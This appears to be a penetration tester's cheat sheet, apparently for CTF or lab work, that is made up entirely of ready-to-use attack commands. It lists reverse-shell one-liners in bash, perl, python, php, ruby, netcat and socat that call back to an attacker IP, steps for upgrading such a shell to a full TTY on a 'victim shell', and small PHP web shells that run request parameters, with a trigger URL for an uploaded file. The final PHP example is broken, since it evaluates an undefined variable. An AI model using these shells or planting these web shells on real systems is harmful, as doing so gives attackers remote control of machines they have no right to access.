#
Reverse Shells
# BASH
bash -i >& /dev/tcp/10.10.14.2/443 0>&1
# PERL
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# PYTHON
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
# RUBY
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
# NETCAT
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
#
Upgrade TTY
# In reverse shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
# In Kali - ZSH
stty raw -echo; fg
# In reverse shell
export SHELL=bash
export TERM=xterm-256color
# Fix rows & columns
stty -a # Local shell
stty rows <num> columns <cols> # Victim shell
#
Using SOCAT
# In Kali
socat file:`tty`,raw,echo=0 tcp-listen:4444
# In Target
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
#
Using Script
script -q /dev/null sh
Ctrl+Z
# In Kali - ZSH
stty raw -echo; fg
# In Kali - BASH
stty raw -echo
fg
export TERM=xterm-256color
#
PHP Simple RCE
<?php
$cmd=shell_exec($_REQUEST['cmd']);
echo $cmd;
?>
Trigger: http://10.10.10.x/uploads/rce.php?cmd=whoami
#
Other PHP RCE examples
<?php echo shell_exec($_GET['cmd']); ?>
<?php $cmd=$_GET['cmd']; system($cmd); ?>
<?php $cmd= $_GET['code']; eval($code); ?>